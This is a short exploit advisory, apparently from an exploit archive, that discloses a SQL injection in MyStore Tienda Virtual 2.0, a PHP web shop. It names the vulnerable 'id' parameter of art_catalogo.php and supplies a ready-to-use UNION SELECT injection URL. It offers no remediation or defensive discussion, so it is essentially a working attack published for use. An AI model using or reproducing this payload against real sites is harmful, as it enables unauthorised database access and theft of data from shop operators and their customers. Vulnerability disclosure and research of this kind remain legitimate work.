id: 17328
date: 01/03/2012
title: MyStore Tienda Virtual SQL Injection Vulnerability
author: Easy Laster
cves: 

.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
    
 ~ SQL Injection MyStore Tienda Virtual ~
    
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
   
[+] Autor: easy laster
   
[+] Vulnerabilities [ SQL Injection ]
  
[+] Page: http://www.mystore.com.mx/
  
[+] Language: [ PHP ]
   
[+] Version: 2.0
  
[+] Date: 03.01.2012
   
[+] Status:vulnerable
.-=--=--=--=--=--=--=--=--=--=--=-.
   
[+] Vulnerability
   
    art_catalogo.php?id=
       
   
[+] Exploitable
   
    http://[host]/[path]/art_catalogo.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11--+



#  0day.today [2023-03-25]  #